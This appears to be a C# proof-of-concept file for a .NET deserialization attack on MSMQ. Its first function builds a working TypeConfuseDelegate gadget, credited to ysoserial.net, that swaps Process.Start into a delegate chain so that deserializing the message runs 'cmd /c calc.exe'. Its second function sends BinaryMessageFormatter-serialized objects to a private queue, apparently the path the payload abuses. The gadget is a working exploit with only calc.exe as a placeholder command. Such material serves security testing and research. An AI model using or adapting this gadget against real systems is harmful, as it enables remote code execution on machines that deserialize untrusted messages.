/* This code creates a gadget that will be executed when deserialized by BinaryFormatter,
* which is the internal deserializer for BinaryMessageFormatter.
* Taken from ysoserial.net - https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
* This gadget was created by James Forshaw
*/
public static Message generateBinaryMessageFormatterPayload()
{
Delegate da = new Comparison <string>(String.Compare);
Comparison <string> d = (Comparison <string>)MulticastDelegate.Combine(da, da);
IComparer <string> comp = Comparer <string> .Create(d);
SortedSet <string> set = new SortedSet <string>(comp);
set.Add("cmd");
set.Add("/c calc.exe");
FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
BindingFlags.NonPublic | BindingFlags.Instance);
object[] invoke_list = d.GetInvocationList();
invoke_list[1] = new Func <string, string, Process>(Process.Start);
fi.SetValue(d, invoke_list);
BinaryMessageFormatter bmf = new BinaryMessageFormatter();
Message exploitMessage = new Message();
bmf.Write(exploitMessage, set);
return(exploitMessage);
}
public void SendBusinessObject(string strTargetProcess, string strSubject,
BusinessObject objSource)
{
string strTargetQueueName;
MessageQueue queue = null;
try
{
strTargetQueueName = ".\\private$\\" + strTargetProcess + "Inbox";
queue = new MessageQueue(strTargetQueueName);
Message message = new Message();
//specify the message formatter
BinaryMessageFormatter formatter = new BinaryMessageFormatter();
message.Formatter = formatter;
//set the message properties
message.Label = strSubject;
formatter.Write(message, objSource);
//send the binary serialized message
queue.Send(message);
}
catch (MessageQueueException exception)
{
EventLog systemLog = new EventLog();
systemLog.Source = "IssueTracker";
systemLog.WriteEntry(exception.Message, EventLogEntryType.Error, 0);
}
finally
{
queue.Close();
}
return;
}
